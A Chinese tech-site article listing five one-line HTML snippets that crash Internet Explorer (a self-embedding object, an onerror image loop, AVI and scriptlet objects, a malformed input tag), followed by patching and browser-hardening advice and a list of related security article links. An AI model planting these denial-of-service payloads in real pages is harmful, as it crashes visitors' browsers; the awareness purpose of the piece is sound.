上一篇:收藏经典:windows消息大全 >>
一行代码崩溃IE
1.object对象链接和嵌入元素循环调用能导致ie崩溃:
<!-
此代码所在的文件名应为crash.htm
-->
<object data=″crash.htm″ type=″text/html″></object>
2.包含恶意image标签的html页面能导致系统进程的无限循环,从而引起ie崩溃。对windows9x操作系统,还会引起系统不稳定:
<img src=″::″ &#111nerror=″this.src='::';″>
对于这个bug微软已经提供了补丁,如果你的系统打了这个补丁的话,你会看到一个弹出警告窗口:
stack overflow at linex(在某行栈溢出)。
3.包含恶意avi object的html页面能引起ie崩溃:
<object classid=″clsid00022613-0000-0000-c000-000000000046″></object>
4.一个包含特殊object对象内容的html页面将导致dos攻击,引起ie崩溃:
<object data=″#″ type=″text/x-scriptlet″></object>
5.畸形的input标签导致ie崩溃:
<input type>
上面罗列的只是一些简单的代码,但能让ie崩溃的恶意代码又何止这些,ie的漏洞也不仅仅是崩溃,严重的漏洞能让心怀恶意者对用户的电脑为所欲为。ie作为绝大多数网民使用的浏览器,加强它的安全性势在必然,如及时打补丁、安装杀毒软件(可查杀一些恶意代码)、不访问不可靠的网站、提高浏览器的安全级别(如禁用activex、禁止脚本、阻止cookie)等。
()
下一篇:脚本安全和利用 >>
相关文章:
- · 安全程序员必读书籍清单
- · 编辑web.config,保证ASP.NET的安全
- · 修复ADSL的Firmware之手记
- · Microsoft平台下的find在网络管理中的妙用
- · 利用组策略对象(GPOs)防止匿名登录
- · 删除系统顽固文件的十二招技巧
- · DoS攻击隐身于合法指令中 难以完全阻绝
- · 我能躲到哪里去?—无线定位技术
- · Windows“安全模式”的五项用途
- · ECHO命令的超详细使用
- · php注入专题
- · 对IPv6在NGI核心层和接入层部署的思考
- · IDS(入侵检测系统)术语
- · 如何用好双WAN路由器
- · 使用IP过滤,轻松管理网络
- · CHKDSK(磁盘检测)命令的运用
- · Linux下口令恢复任我行
- · 使用FlashFXP来提升权限
- · 部署防火墙策略的十六条守则
- · TopStyle Pro 使用技巧
- · 21分钟解决struts国际化和中文问题
- · WindowsNT/2K/XP/2K3系统实用工具集
- · TOPSEC网络安全体系平台
- · 巧用比较并合并文档 RPC服务启用的方法
- · Windows管道技术简述
- · 消除防火墙的局限性和脆弱性
- · Win2003作路由 局域网共享多出口上网
- · dvdrip、dvdscr、tc版等的区别
- · Windows2000/XP服务攻略
- · 破解加密光盘五法破解加密光盘五法
- · 常用的DDOS软件+动画教程
- · 教你申请10GB免费网络硬盘
- · 人在江湖安全第一 使用SNMP服务的安全防范
- · NT系统的门卫——SAM
- · 打造功能更强大更安全的Windows XP启动密码
- · 秘技!让毒霸和瑞星同时为你站岗
- · 优化Windows预读功能为系统提速
- · 远程线程嵌入技术
